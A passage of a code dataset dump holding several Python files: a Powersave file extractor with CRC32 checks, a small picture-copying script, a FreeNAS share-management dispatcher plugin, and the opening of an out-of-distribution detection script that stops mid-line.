+{"seq_id":"368468152","text":"# coding: utf-8\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport binascii\nimport codecs\nimport struct\nimport sys\nimport Common\n\n\ndef syntax():\n print(\"Syntax: ExtractPowersave.py input.bin [-r rawdata.raw] [-n]\")\n print(\" input.bin : File from which to extract raw data\")\n print(\" -r rowdata.raw : File to write the raw data\")\n print(\" -n : Display the display name of the powersave\")\n print(\" At least one of the two options is required.\")\n return 1\n\n\nclass ExtractPowersave:\n \"\"\"\n This class permit the extraction of the row data from a Powersave\n file to a rowdata file.\n \"\"\"\n\n def __init__(self, powersave_file, row_file=None):\n \"\"\"\n Create a new Extract Powersave file utility instance.\n\n :param powersave_file:\n File from which to extract raw data.\n :type powersave_file: str\n :param row_file:\n File to write the raw data (Optionnal).\n If it's not defined, only the display name of the\n file are extract and return.\n :type row_file: str\n \"\"\"\n self.powersave_file = powersave_file\n self.row_file = row_file\n\n def extract(self):\n \"\"\"\n Extract the row data from powersave_file and return the display name\n of the powersave file.\n\n :return: The dysplay name of the powersave file.\n :rtype str\n\n :raises IOError:\n \"\"\"\n\n with open(self.powersave_file, \"rb\") as infile:\n header = b\"\"\n\n header += infile.read(0x14 - len(header))\n if len(header) != 0x14:\n raise IOError(\"Powersave format error : header size\")\n\n computedHeaderCRC32 = Common.datel_crc32(header + Common.encode_dword(0))\n\n readHeaderCRC32 = infile.read(4)\n if len(readHeaderCRC32) != 4:\n raise IOError(\"Powersave format error : CRC32 size\")\n\n readHeaderCRC32 = Common.decode_dword(readHeaderCRC32)[0]\n\n if computedHeaderCRC32 != readHeaderCRC32:\n raise IOError('Unverified Header CRC32')\n\n readPayloadCRC32 = infile.read(4)\n if len(readPayloadCRC32) != 4:\n raise IOError(\"Powersave format error : Payload CRC32\")\n readPayloadCRC32 = Common.decode_dword(readPayloadCRC32)[0]\n\n description = b\"\"\n while len(description) != 0x40 * 2:\n readData = infile.read(0x40 * 2 - len(description))\n if readData == \"\":\n break\n description += readData\n\n if len(description) != 0x40 * 2:\n raise IOError(\"Power save format error : display name invalid\")\n\n # The description is little-endian UTF-16.\n description = codecs.decode(description, \"utf-16le\")\n\n try:\n index = description.index(\"\\0\")\n description = description[:index]\n except ValueError:\n pass\n\n if self.row_file is not None:\n computedPayloadCRC32 = b''\n with open(self.row_file, \"wb\") as outfile:\n # Calculate Datel-CRC32 of payload.\n computedPayloadCRC32 = Common.datel_crc32(b'')\n while True:\n data = infile.read(16384)\n if len(data) == 0:\n break\n computedPayloadCRC32 = Common.datel_crc32(data, computedPayloadCRC32)\n outfile.write(data)\n\n if computedPayloadCRC32 != readPayloadCRC32:\n raise IOError('Power save format error : Unverified Payload CRC32')\n\n return description\n\nif __name__ == \"__main__\":\n if len(sys.argv) <= 2:\n syntax()\n sys.exit(1)\n\n powerSaveFile = sys.argv[1]\n index_option = 2\n powerSavename = False\n rawFile = None\n while index_option < len(sys.argv):\n option = sys.argv[index_option]\n if option == '-d':\n powerSavename = True\n index_option+=1\n elif option == '-r':\n if index_option + 1 < len(sys.argv):\n rawFile = sys.argv[index_option + 1]\n index_option += 2\n else:\n syntax()\n sys.exit(1)\n else:\n syntax()\n sys.exit(1)\n\n if not powerSavename and rawFile is None:\n syntax()\n sys.exit(1)\n\n extractor = ExtractPowersave(powerSaveFile, rawFile)\n description = extractor.extract()\n if powerSavename:\n print(description)\n","sub_path":"ExtractPowersave.py","file_name":"ExtractPowersave.py","file_ext":"py","file_size_in_byte":4684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"263999604","text":"\"\"\"Take empty pics from pics2, as catalogued in empty_pics,\n and move pics from pics\"\"\"\nimport os\n\nto_move = {}\nwith open('working/empty_pics') as f:\n for line in f:\n to_move[line.strip()] = True\nfor m in to_move:\n os.system('cp working/pics/' + m + ' working/pics2/')\n","sub_path":"cp_good_pics.py","file_name":"cp_good_pics.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"109539165","text":"#\n# Copyright 2015 iXsystems, Inc.\n# All rights reserved\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted providing that the following conditions\n# are met:\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR\n# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY\n# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS\n# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)\n# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,\n# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING\n# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n#\n#####################################################################\n\nimport os\nimport errno\nfrom freenas.dispatcher.rpc import description, accepts, returns, private\nfrom freenas.dispatcher.rpc import SchemaHelper as h, generator\nfrom task import Task, TaskException, TaskDescription, VerifyException, Provider, RpcException, query, TaskWarning\nfrom freenas.utils import normalize, in_directory, remove_unchanged, query as q\nfrom freenas.utils.lazy import lazy\nfrom debug import AttachRPC\nfrom utils import split_dataset, save_config, load_config, delete_config\n\n\nCONFIG_VERSION = 100000\n\n\n@description(\"Provides information on shares\")\nclass SharesProvider(Provider):\n @query('Share')\n @generator\n def query(self, filter=None, params=None):\n def extend(share):\n path = None\n try:\n path = self.translate_path(share['id'])\n except RpcException:\n pass\n\n def get_perms():\n if share['target_type'] in ('DIRECTORY', 'DATASET', 'FILE'):\n perms = self.dispatcher.call_sync('filesystem.stat', path)\n return perms['permissions']\n\n def get_perm_type():\n if share['target_type'] == 'DATASET':\n return self.dispatcher.call_sync(\n 'volume.dataset.query',\n [('id', '=', share['target_path'])],\n {'select': 'permissions_type', 'single': True}\n )\n\n share['filesystem_path'] = path\n share['permissions_type'] = lazy(get_perm_type)\n share['permissions'] = lazy(get_perms)\n return share\n\n return q.query(\n self.datastore.query_stream('shares', callback=extend),\n *(filter or []),\n stream=True,\n **(params or {})\n )\n\n @description(\"Returns list of supported sharing providers\")\n @accepts()\n @returns(h.ref('ShareTypes'))\n def supported_types(self):\n result = {}\n for p in list(self.dispatcher.plugins.values()):\n if p.metadata and p.metadata.get('type') == 'sharing':\n result[p.metadata['method']] = {\n 'subtype': p.metadata['subtype'],\n 'perm_type': p.metadata.get('perm_type'),\n 'version': p.metadata.get('version')\n }\n\n return result\n\n @description(\"Returns list of clients connected to particular share\")\n @accepts(str)\n @returns(h.array(h.ref('ShareClient')))\n def get_connected_clients(self, id):\n share = self.datastore.get_by_id('shares', id)\n if not share:\n raise RpcException(errno.ENOENT, 'Share not found')\n\n return self.dispatcher.call_sync('share.{0}.get_connected_clients'.format(share['type']), id)\n\n @description(\"Get shares dependent on provided filesystem path\")\n @accepts(str, bool, bool)\n @returns(h.array(h.ref('Share')))\n def get_dependencies(self, path, enabled_only=True, recursive=True):\n result = []\n if enabled_only:\n shares = self.datastore.query_stream('shares', ('enabled', '=', True))\n else:\n shares = self.datastore.query_stream('shares')\n\n for i in shares:\n target_path = self.translate_path(i['id'])\n if recursive:\n if in_directory(target_path, path):\n result.append(i)\n else:\n if target_path == path:\n result.append(i)\n\n return result\n\n @private\n def translate_path(self, share_id):\n share = self.datastore.get_by_id('shares', share_id)\n if not share:\n raise RpcException(errno.ENOENT, 'Share {0} not found'.format(share_id))\n\n return self.dispatcher.call_sync('share.expand_path', share['target_path'], share['target_type'])\n\n @private\n def expand_path(self, path, type):\n root = self.dispatcher.call_sync('volume.get_volumes_root')\n if type == 'DATASET':\n return os.path.join(root, path)\n\n if type == 'ZVOL':\n return os.path.join('/dev/zvol', path)\n\n if type in ('DIRECTORY', 'FILE'):\n return path\n\n raise RpcException(errno.EINVAL, 'Invalid share target type {0}'.format(type))\n\n @private\n def get_directory_path(self, share_id):\n share = self.datastore.get_by_id('shares', share_id)\n return self.dispatcher.call_sync('share.get_dir_by_path', share['target_path'], share['target_type'])\n\n @private\n def get_dir_by_path(self, path, type):\n root = self.dispatcher.call_sync('volume.get_volumes_root')\n if type == 'DATASET':\n return os.path.join(root, path)\n\n if type == 'ZVOL':\n return os.path.dirname(os.path.join(root, path))\n\n if type == 'DIRECTORY':\n return path\n\n if type == 'FILE':\n return os.path.dirname(path)\n\n raise RpcException(errno.EINVAL, 'Invalid share target type {0}'.format(type))\n\n\n@description(\"Creates new share\")\n@accepts(\n h.all_of(\n h.ref('Share'),\n h.required('name', 'type', 'target_type', 'target_path', 'properties')\n ),\n h.one_of(\n h.ref('VolumeDatasetProperties'),\n None\n ),\n bool\n)\nclass CreateShareTask(Task):\n @classmethod\n def early_describe(cls):\n return \"Creating share\"\n\n def describe(self, share, dataset_properties=None, enable_service=False):\n return TaskDescription(\"Creating share {name}\", name=share.get('name') if share else '')\n\n def verify(self, share, dataset_properties=None, enable_service=False):\n if not self.dispatcher.call_sync('share.supported_types').get(share['type']):\n raise VerifyException(errno.ENXIO, 'Unknown sharing type {0}'.format(share['type']))\n\n return ['system']\n\n def run(self, share, dataset_properties=None, enable_service=False):\n if share['target_type'] == 'ZVOL':\n parent_ds = '/'.join(share['target_path'].split('/')[:-1])\n shareable = bool(self.dispatcher.call_sync('volume.dataset.query', [('name', '=', parent_ds)]))\n else:\n share_path = self.dispatcher.call_sync('share.expand_path', share['target_path'], share['target_type'])\n if share['target_type'] != 'FILE':\n share_path = os.path.dirname(share_path)\n shareable = os.path.exists(share_path)\n\n if not shareable:\n raise TaskException(errno.ENOENT, 'Selected share target {0} does not exist or cannot be created'.format(\n share['target_path']\n ))\n\n root = self.dispatcher.call_sync('volume.get_volumes_root')\n share_type = self.dispatcher.call_sync('share.supported_types').get(share['type'])\n pool_mountpoints = tuple(self.dispatcher.call_sync('volume.query', [], {'select': 'mountpoint'}))\n\n assert share_type['subtype'] in ('FILE', 'BLOCK'), \"Unsupported share type: {0}\".format(share_type['subtype'])\n\n if self.datastore.exists(\n 'shares',\n ('type', '=', share['type']),\n ('name', '=', share['name'])\n ):\n raise TaskException(errno.EEXIST, 'Share {0} of type {1} already exists'.format(\n share['name'],\n share['type']\n ))\n\n if self.datastore.exists(\n 'shares',\n ('target_type', '=', share['target_type']),\n ('target_path', '=', share['target_path'])\n ):\n self.add_warning(TaskWarning(errno.EEXIST, f'There are other shares set on {share[\"target_path\"]}'))\n\n normalize(share, {\n 'enabled': True,\n 'immutable': False,\n 'description': ''\n })\n\n if share['target_type'] in ('DATASET', 'ZVOL'):\n dataset = share['target_path']\n pool = share['target_path'].split('/')[0]\n path = os.path.join(root, dataset)\n\n if not self.dispatcher.call_sync('zfs.dataset.query', [('name', '=', dataset)], {'single': True}):\n if share_type['subtype'] == 'FILE':\n self.run_subtask_sync('volume.dataset.create', {\n 'volume': pool,\n 'id': dataset,\n 'permissions_type': share_type['perm_type'],\n 'properties': dataset_properties or {}\n })\n\n if share_type['subtype'] == 'BLOCK':\n self.run_subtask_sync('volume.dataset.create', {\n 'volume': pool,\n 'id': dataset,\n 'type': 'VOLUME',\n 'volsize': share['properties']['size'],\n 'properties': dataset_properties or {}\n })\n else:\n if share_type['subtype'] == 'FILE':\n self.run_subtask('volume.dataset.update', dataset, {\n 'permissions_type': share_type['perm_type']\n })\n\n elif share['target_type'] == 'DIRECTORY':\n if not share['target_path'].startswith(pool_mountpoints):\n raise TaskException(errno.EINVAL, \"Provided directory has to reside within user defined ZFS pool\")\n\n # Verify that target directory exists\n path = share['target_path']\n if not os.path.isdir(path):\n raise TaskException(errno.ENOENT, \"Target directory {0} doesn't exist\".format(path))\n\n elif share['target_type'] == 'FILE':\n if not share['target_path'].startswith(pool_mountpoints):\n raise TaskException(errno.EINVAL, \"Provided file has to reside within user defined ZFS pool\")\n # Verify that target file exists\n path = share['target_path']\n if not os.path.isfile(path):\n raise TaskException(errno.ENOENT, \"Target file {0} doesn't exist\".format(path))\n\n else:\n raise AssertionError('Invalid target type')\n\n if share.get('permissions') and share['target_type'] not in ('ZVOL', 'FILE'):\n self.run_subtask_sync('file.set_permissions', path, share.pop('permissions'))\n\n id = self.run_subtask_sync('share.{0}.create'.format(share['type']), share)\n self.dispatcher.dispatch_event('share.changed', {\n 'operation': 'create',\n 'ids': [id]\n })\n\n new_share = self.datastore.get_by_id('shares', id)\n path = self.dispatcher.call_sync('share.get_directory_path', new_share['id'])\n try:\n save_config(\n path,\n '{0}-{1}'.format(new_share['type'], new_share['name']),\n new_share,\n file_perms=0o600,\n version=CONFIG_VERSION\n )\n except OSError as err:\n self.add_warning(TaskWarning(errno.ENXIO, 'Cannot save backup config file: {0}'.format(str(err))))\n\n service_state = self.dispatcher.call_sync('service.query', [('name', '=', share['type'])], {'single': True})\n if service_state['state'] != 'RUNNING':\n if enable_service:\n config = service_state['config']\n config['enable'] = True\n self.run_subtask_sync('service.update', service_state['id'], {'config': config})\n else:\n self.add_warning(TaskWarning(\n errno.ENXIO, \"Share has been created but the service {0} is not currently running \"\n \"Please enable the {0} service.\".format(share['type'])\n ))\n\n return id\n\n\n@description(\"Updates existing share\")\n@accepts(str, h.ref('Share'), bool)\nclass UpdateShareTask(Task):\n @classmethod\n def early_describe(cls):\n return \"Updating share\"\n\n def describe(self, id, updated_fields, enable_service=False):\n share = self.datastore.get_by_id('shares', id)\n return TaskDescription(\"Updating share {name}\", name=share.get('name', id) if share else id)\n\n def verify(self, id, updated_fields, enable_service=False):\n return ['system']\n\n def run(self, id, updated_fields, enable_service=False):\n share = self.datastore.get_by_id('shares', id)\n if not share:\n raise TaskException(errno.ENOENT, 'Share not found')\n\n if share['immutable']:\n raise TaskException(errno.EACCES, 'Cannot modify immutable share {0}.'.format(id))\n\n if 'name' in updated_fields or 'type' in updated_fields:\n share.update(updated_fields)\n if self.datastore.exists(\n 'shares',\n ('id', '!=', id),\n ('type', '=', share['type']),\n ('name', '=', share['name'])\n ):\n raise TaskException(errno.EEXIST, 'Share {0} of type {1} already exists'.format(\n share['name'],\n share['type']\n ))\n\n if 'target_type' in updated_fields or 'target_path' in updated_fields:\n if self.datastore.exists(\n 'shares',\n ('target_type', '=', share['target_type']),\n ('target_path', '=', share['target_path']),\n ('id', '!=', id)\n ):\n self.add_warning(TaskWarning(errno.EEXIST, f'There are other shares set on {share[\"target_path\"]}'))\n\n path_after_update = updated_fields.get('target_path', share['target_path'])\n type_after_update = updated_fields.get('target_type', share['target_type'])\n permissions = updated_fields.pop('permissions', None)\n share_path = self.dispatcher.call_sync('share.expand_path', path_after_update, type_after_update)\n\n if type_after_update in ('DIRECTORY', 'FILE'):\n pool_mountpoints = tuple(self.dispatcher.call_sync('volume.query', [], {'select': 'mountpoint'}))\n if not path_after_update.startswith(pool_mountpoints):\n raise TaskException(errno.EINVAL, \"Provided directory or file has to reside within user defined ZFS pool\")\n\n if not os.path.exists(share_path):\n raise TaskException(\n errno.ENOENT,\n 'Selected share target {0} does not exist'.format(path_after_update)\n )\n\n share = self.datastore.get_by_id('shares', id)\n remove_unchanged(updated_fields, share)\n\n path = self.dispatcher.call_sync('share.get_directory_path', share['id'])\n try:\n delete_config(\n path,\n '{0}-{1}'.format(share['type'], share['name'])\n )\n except (OSError, ValueError):\n pass\n\n if share['target_type'] == 'ZVOL' and q.get(updated_fields, 'properties.size'):\n pool, dataset = split_dataset(share['target_path'])\n self.run_subtask_sync('volume.dataset.update', dataset, {\n 'volsize': q.get(updated_fields, 'properties.size')\n })\n\n if 'type' in updated_fields:\n old_share_type = share['type']\n new_share_type = self.dispatcher.call_sync('share.supported_types').get(updated_fields['type'])\n if share['target_type'] == 'DATASET':\n pool, dataset = split_dataset(share['target_path'])\n self.join_subtasks(\n self.run_subtask('volume.dataset.update', dataset, {\n 'permissions_type': new_share_type['perm_type']\n })\n )\n\n share.update(updated_fields)\n self.run_subtask_sync('share.{0}.delete'.format(old_share_type), id)\n self.run_subtask_sync('share.{0}.create'.format(updated_fields['type']), share)\n else:\n self.run_subtask_sync('share.{0}.update'.format(share['type']), id, updated_fields)\n\n if permissions:\n path = self.dispatcher.call_sync('share.translate_path', id)\n self.run_subtask_sync('file.set_permissions', path, permissions)\n\n self.dispatcher.dispatch_event('share.changed', {\n 'operation': 'update',\n 'ids': [share['id']]\n })\n\n updated_share = self.datastore.get_by_id('shares', id)\n path = self.dispatcher.call_sync('share.get_directory_path', updated_share['id'])\n try:\n save_config(\n path,\n '{0}-{1}'.format(updated_share['type'], updated_share['name']),\n updated_share,\n file_perms=0o600,\n version=CONFIG_VERSION\n )\n except OSError as err:\n self.add_warning(TaskWarning(errno.ENXIO, 'Cannot save backup config file: {0}'.format(str(err))))\n\n service_state = self.dispatcher.call_sync('service.query', [('name', '=', share['type'])], {'single': True})\n if service_state['state'] != 'RUNNING':\n if enable_service:\n config = service_state['config']\n config['enable'] = True\n self.run_subtask_sync('service.update', service_state['id'], {'config': config})\n else:\n self.add_warning(TaskWarning(\n errno.ENXIO,\n \"Share has been updated but the service {0} is not currently running \"\n \"Please enable the {0} service.\".format(share['type'])\n ))\n\n\n@description(\"Imports existing share\")\n@accepts(str, str, str)\nclass ImportShareTask(Task):\n @classmethod\n def early_describe(cls):\n return \"Importing share\"\n\n def describe(self, config_path, name, type):\n return TaskDescription(\"Importing share {name} from {config_path}\", name=name, config_path=config_path)\n\n def verify(self, config_path, name, type):\n return ['system']\n\n def run(self, config_path, name, type):\n try:\n share = load_config(config_path, f'{type}-{name}', version=CONFIG_VERSION)\n except FileNotFoundError:\n raise VerifyException(\n errno.ENOENT,\n f'There is no share {name} of type {type} at {config_path} to be imported.'\n )\n except ValueError as err:\n raise VerifyException(errno.EINVAL, f'Cannot read configuration file: {err}')\n\n if share['type'] != type:\n raise VerifyException(\n errno.EINVAL,\n f'Share type {type} does not match configuration file entry type {share[\"type\"]}'\n )\n\n if not self.dispatcher.call_sync('share.supported_types').get(share['type']):\n raise TaskException(errno.ENXIO, f'Unknown sharing type {share[\"type\"]}')\n\n if self.datastore.exists(\n 'shares',\n ('type', '=', share['type']),\n ('name', '=', share['name'])\n ):\n raise TaskException(errno.EEXIST, 'Share {share[\"name\"]} of type {share[\"type\"]} already exists')\n\n id = self.run_subtask_sync(f'share.{share[\"type\"]}.import', share)\n self.dispatcher.dispatch_event('share.changed', {\n 'operation': 'create',\n 'ids': [id]\n })\n\n return id\n\n\n@description(\"Sets share immutable\")\n@accepts(str, bool)\nclass ShareSetImmutableTask(Task):\n @classmethod\n def early_describe(cls):\n return 'Updating share\\'s immutable property'\n\n def describe(self, id, immutable):\n share = self.datastore.get_by_id('shares', id)\n return TaskDescription(\n 'Setting {name} share\\'s immutable property to {value}',\n name=share.get('name', id) if share else id,\n value='on' if immutable else 'off'\n )\n\n def verify(self, id, immutable):\n return ['system']\n\n def run(self, id, immutable):\n if not self.datastore.exists('shares', id):\n raise TaskException(errno.ENOENT, 'Share {0} does not exist'.format(id))\n\n share = self.datastore.get_by_id('shares', id)\n share['immutable'] = immutable\n share['enabled'] = not immutable\n self.datastore.update('shares', id, share)\n self.dispatcher.dispatch_event('share.changed', {\n 'operation': 'update',\n 'ids': [share['id']]\n })\n\n\n@description(\"Deletes share\")\n@accepts(str, bool)\nclass DeleteShareTask(Task):\n @classmethod\n def early_describe(cls):\n return \"Deleting share\"\n\n def describe(self, id, delete_dataset=False):\n share = self.datastore.get_by_id('shares', id)\n return TaskDescription(\"Deleting share {name}\", name=share.get('name', id) if share else id)\n\n def verify(self, id, delete_dataset=False):\n return ['system']\n\n def run(self, id, delete_dataset=False):\n share = self.datastore.get_by_id('shares', id)\n target_type = share['target_type']\n dataset = None\n\n if target_type == 'DATASET' or target_type == 'ZVOL':\n dataset = share['target_path']\n elif delete_dataset:\n raise TaskException(errno.EINVAL, 'Cannot delete dataset for non-dataset share')\n\n if not share:\n raise TaskException(errno.ENOENT, 'Share not found')\n\n path = self.dispatcher.call_sync('share.get_directory_path', share['id'])\n\n try:\n delete_config(\n path,\n '{0}-{1}'.format(share['type'], share['name'])\n )\n except OSError:\n pass\n\n self.run_subtask_sync('share.{0}.delete'.format(share['type']), id)\n self.dispatcher.dispatch_event('share.changed', {\n 'operation': 'delete',\n 'ids': [id]\n })\n if dataset and delete_dataset:\n self.run_subtask_sync('volume.dataset.delete', dataset)\n\n\n@description(\"Export share\")\n@accepts(str)\nclass ExportShareTask(Task):\n @classmethod\n def early_describe(cls):\n return \"Exporting share\"\n\n def describe(self, id):\n share = self.datastore.get_by_id('shares', id)\n return TaskDescription(\"Exporting share {name}\", name=share.get('name', id) if share else id)\n\n def verify(self, id):\n return ['system']\n\n def run(self, id):\n share = self.datastore.get_by_id('shares', id)\n if not share:\n raise TaskException(errno.ENOENT, 'Share not found')\n\n self.run_subtask_sync('share.{0}.delete'.format(share['type']), id)\n self.dispatcher.dispatch_event('share.changed', {\n 'operation': 'delete',\n 'ids': [id]\n })\n\n\n@description(\"Deletes all shares dependent on specified volume/dataset\")\n@accepts(str)\nclass DeleteDependentShares(Task):\n @classmethod\n def early_describe(cls):\n return 'Deleting shares related to system path'\n\n def describe(self, path):\n return TaskDescription('Deleting shares related to system path {name}', name=path)\n\n def verify(self, path):\n return ['system']\n\n def run(self, path):\n for i in self.dispatcher.call_sync('share.get_dependencies', path):\n self.run_subtask_sync('share.delete', i['id'])\n\n\n@private\n@description(\"Updates all shares related to specified volume/dataset\")\n@accepts(str, h.ref('Share'))\nclass UpdateRelatedShares(Task):\n @classmethod\n def early_describe(cls):\n return 'Updating shares related to system path'\n\n def describe(self, path, updated_fields):\n return TaskDescription('Updating shares related to system path {name}', name=path)\n\n def verify(self, path, updated_fields):\n return ['system']\n\n def run(self, path, updated_fields):\n subtasks = []\n for i in self.dispatcher.call_sync('share.get_dependencies', path, False):\n subtasks.append(self.run_subtask('share.update', i['id'], updated_fields))\n\n self.join_subtasks(*subtasks)\n\n\n@description(\"Kills client connections from specified IP address\")\n@accepts(str, str)\nclass ShareTerminateConnectionTask(Task):\n @classmethod\n def early_describe(cls):\n return 'Killing connections to share'\n\n def describe(self, share_type, address):\n return TaskDescription('Killing {address} connections to {name} share', address=address, name=share_type)\n\n def verify(self, share_type, address):\n return ['system']\n\n def run(self, share_type, address):\n try:\n self.run_subtask_sync('share.{0}.terminate_connection'.format(share_type), address)\n except RpcException as err:\n if err.code not in (errno.ENOTSUP, errno.ENXIO):\n raise\n\n\ndef collect_debug(dispatcher):\n yield AttachRPC('share-query', 'share.query')\n\n\ndef _depends():\n return ['VolumePlugin']\n\n\ndef _init(dispatcher, plugin):\n plugin.register_schema_definition('Share', {\n 'type': 'object',\n 'properties': {\n 'id': {'type': 'string'},\n 'name': {'type': 'string'},\n 'description': {'type': 'string'},\n 'enabled': {'type': 'boolean'},\n 'immutable': {'type': 'boolean'},\n 'type': {'type': 'string'},\n 'target_type': {'$ref': 'ShareTargettype'},\n 'target_path': {'type': 'string'},\n 'filesystem_path': {\n 'type': 'string',\n 'readOnly': True\n },\n 'permissions_type': {\n 'oneOf': [\n {'$ref': 'VolumeDatasetPermissionsType'},\n {'type': 'null'}\n ]\n },\n 'permissions': {\n 'oneOf': [\n {'$ref': 'Permissions'},\n {'type': 'null'}\n ]\n },\n 'properties': {'$ref': 'ShareProperties'}\n }\n })\n\n plugin.register_schema_definition('ShareTargettype', {\n 'type': 'string',\n 'enum': ['DATASET', 'ZVOL', 'DIRECTORY', 'FILE']\n })\n\n plugin.register_schema_definition('ShareClient', {\n 'type': 'object',\n 'properties': {\n 'host': {'type': 'string'},\n 'share': {'type': 'string'},\n 'user': {'type': ['string', 'null']},\n 'connected_at': {'type': ['string', 'null']},\n 'extra': {\n 'type': 'object'\n }\n }\n })\n\n plugin.register_schema_definition('ShareTypes', {\n 'type': 'object',\n 'additionalProperties': {\n 'type': 'object',\n 'properties': {\n 'subtype': {'$ref': 'ShareTypesSubtype'},\n 'perm_type': {'oneOf': [\n {'$ref': 'ShareTypesPermtype'},\n {'type': 'null'}\n ]},\n },\n 'additionalProperties': False\n }\n })\n\n plugin.register_schema_definition('ShareTypesSubtype', {\n 'type': 'string',\n 'enum': ['FILE', 'BLOCK']\n })\n\n plugin.register_schema_definition('ShareTypesPermtype', {\n 'type': 'string',\n 'enum': ['PERM', 'ACL']\n })\n\n def volume_pre_destroy(args):\n try:\n path = dispatcher.call_sync('volume.resolve_path', args['name'], '')\n except RpcException:\n return True\n\n dispatcher.call_task_sync('share.delete_dependent', path)\n dispatcher.call_task_sync('share.delete_dependent', os.path.join('/dev/zvol', args['name']))\n return True\n\n def volume_rename(args):\n for share in dispatcher.call_sync('share.query'):\n new_path = share['target_path']\n if share['target_path'].startswith(args['name']):\n new_path = new_path.replace(args['name'], args['new_name'], 1)\n\n elif share['target_type'] in ('DIRECTORY', 'FILE'):\n if share['target_path'].startswith(args['mountpoint']):\n new_path = new_path.replace(args['mountpoint'], args['new_mountpoint'], 1)\n\n if new_path is not share['target_path']:\n dispatcher.call_task_sync('share.update', share['id'], {'target_path': new_path})\n return True\n\n def set_related_enabled(name, enabled):\n pool_properties = dispatcher.call_sync(\n 'zfs.pool.query',\n [('name', '=', name)],\n {'single': True, 'select': 'properties'}\n )\n if not q.get(pool_properties, 'readonly.parsed'):\n path = dispatcher.call_sync('volume.resolve_path', name, '')\n dispatcher.call_task_sync('share.update_related', path, {'enabled': enabled})\n dispatcher.call_task_sync('share.update_related', os.path.join('/dev/zvol', name), {'enabled': enabled})\n\n def volume_detach(args):\n set_related_enabled(args['name'], False)\n return True\n\n def volume_attach(args):\n set_related_enabled(args['name'], True)\n return True\n\n def update_share_properties_schema():\n plugin.register_schema_definition('ShareProperties', {\n 'discriminator': '%type',\n 'oneOf': [\n {'$ref': 'Share{0}'.format(name.title())} for name in dispatcher.call_sync('share.supported_types')\n ]\n })\n\n # Register providers\n plugin.register_provider('share', SharesProvider)\n\n # Register task handlers\n plugin.register_task_handler('share.create', CreateShareTask)\n plugin.register_task_handler('share.update', UpdateShareTask)\n plugin.register_task_handler('share.delete', DeleteShareTask)\n plugin.register_task_handler('share.export', ExportShareTask)\n plugin.register_task_handler('share.import', ImportShareTask)\n plugin.register_task_handler('share.immutable.set', ShareSetImmutableTask)\n plugin.register_task_handler('share.delete_dependent', DeleteDependentShares)\n plugin.register_task_handler('share.update_related', UpdateRelatedShares)\n plugin.register_task_handler('share.terminate_connection', ShareTerminateConnectionTask)\n\n # Register Event Types\n plugin.register_event_type(\n 'share.changed',\n schema={\n 'type': 'object',\n 'properties': {\n 'operation': {'type': 'string', 'enum': ['create', 'delete', 'update']},\n 'ids': {'type': 'array', 'items': 'string'},\n },\n 'additionalProperties': False\n }\n )\n\n update_share_properties_schema()\n dispatcher.register_event_handler('server.plugin.loaded', update_share_properties_schema)\n\n # Register Hooks\n plugin.attach_hook('volume.pre_destroy', volume_pre_destroy)\n plugin.attach_hook('volume.pre_detach', volume_detach)\n plugin.attach_hook('volume.post_attach', volume_attach)\n plugin.attach_hook('volume.post_rename', volume_rename)\n\n # Register debug hooks\n plugin.register_debug_hook(collect_debug)\n","sub_path":"src/dispatcher/plugins/SharingPlugin.py","file_name":"SharingPlugin.py","file_ext":"py","file_size_in_byte":31945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"262042013","text":"import gc\nimport logging\nimport os\nimport re\nfrom functools import partial\nfrom glob import glob\nimport matplotlib.pylab as plt\nimport numpy as np\nimport torch as th\nimport torch.nn.functional as F\nimport tqdm\n\nimport models\nfrom ast import literal_eval\nfrom calculate_log import metric\nfrom data import get_dataset\nfrom preprocess import get_transform\nfrom utils.log import setup_logging\nfrom utils.meters import MeterDict, AverageMeter, accuracy,SimpleOnlineMeterFactory\nimport reductions as rd\nimport layer_selection as ls\nimport channel_selection as cs\nfrom utils.temp_scaling import ModelWithTemperature, _ECELoss\nfrom OODdetector import OODDetector, measure_v2\n\n## todo remove\n# use this setting to save gpu memory\nglobal _USE_PERCENTILE_DEVICE\nglobal _MONITOR_OP_OUTPUTS\n\n_MONITOR_OP_OUTPUTS = False # True # used to flip stats monitors to output tracking instead if input tracking\n_USE_PERCENTILE_DEVICE = False\n_TRACK_SOFTMAX_TEMP = 100\n_DROP_LAST_BATCH_MEASURE = True\n\n\nclass TrackOutput(th.nn.Module):\n def __init__(self, model, track_smx_output=False, track_fc_output=True, temperature=None):\n super().__init__()\n self.model = model\n self.temp = temperature or 1\n if track_fc_output:\n self.output_fc = th.nn.Identity()\n if track_smx_output:\n self.output_softmax = th.nn.Identity()\n\n def forward(self, x):\n out = self.model(x)\n if hasattr(self, 'output_fc'):\n out = self.output_fc(out)\n if hasattr(self, 'output_softmax'):\n ## do not change model output, this will only be used to monitor activations by the tracker\n tsmx = self.output_softmax(F.softmax(out / self.temp, -1))\n return out\n\n\n#a hack that uses split string for fine grain control over the returned dataset\ndef get_ds_split_modifier(dataset,split,transform,default_limit,default_per_class_limit):\n if '@' in split:\n defaults = dict(transform=transform, limit=default_limit, 